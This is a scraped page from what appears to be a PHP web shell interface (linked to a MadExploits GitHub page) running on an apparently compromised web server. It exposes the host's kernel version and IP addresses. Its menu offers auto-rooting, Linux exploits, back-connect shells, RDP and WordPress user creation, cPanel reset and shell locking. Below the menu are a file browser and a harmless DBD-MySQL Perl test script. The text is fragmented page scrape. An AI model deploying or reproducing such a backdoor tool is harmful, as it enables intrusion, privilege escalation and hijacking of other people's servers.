Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.137.221.114
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-DBD-MySQL-4.023 /
eg /
[ HOME SHELL ]
Name
Size
Permission
Action
bug14979.pl
789
B
-rw-r--r--
bug21028.pl
2.19
KB
-rw-r--r--
bug30033.pl
868
B
-rw-r--r--
bug30033pg.pl
456
B
-rw-r--r--
decimal_test.pl
839
B
-rw-r--r--
issue21946.pl
848
B
-rw-r--r--
prepare_memory_usage.pl
450
B
-rw-r--r--
proc_example1.pl
1.03
KB
-rw-r--r--
proc_example2.pl
1.38
KB
-rw-r--r--
proc_example2a.pl
1.29
KB
-rw-r--r--
proc_example2b.pl
1.27
KB
-rw-r--r--
proc_example3.pl
901
B
-rw-r--r--
proc_example4.pl
1.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bug14979.pl
#! /usr/bin/perl -wT use strict; use DBI(); MAIN: { $ENV{'DBI_DSN'} ||= 'dbi:mysql:dbname=mysql:mysql_server_prepare=1'; $ENV{'DBI_USER'} ||= 'root'; $ENV{'DBI_PASS'} ||= ''; my ($dbh) = DBI->connect($ENV{DBI_DSN}, $ENV{DBI_USER}, $ENV{DBI_PASS}, {RaiseError => 1, PrintError => 0, AutoCommit => 0}); $dbh->trace(3,"bug14979.trace"); my ($sql) = qq[SELECT * FROM mysql.user WHERE user LIKE ?]; my ($sth) = $dbh->prepare($sql); $sth->execute('foo'); $sth->finish(); my ($pid); if ($pid = fork()) { waitpid($pid, 0); unless ($? == 0) { die("Child failed to execute successfully\n"); } } elsif (defined $pid) { $dbh->{'InactiveDestroy'} = 1; exit(0); } else { die("Failed to fork:$!\n"); } $sth->execute('foo'); $sth->finish(); $dbh->disconnect(); }
Close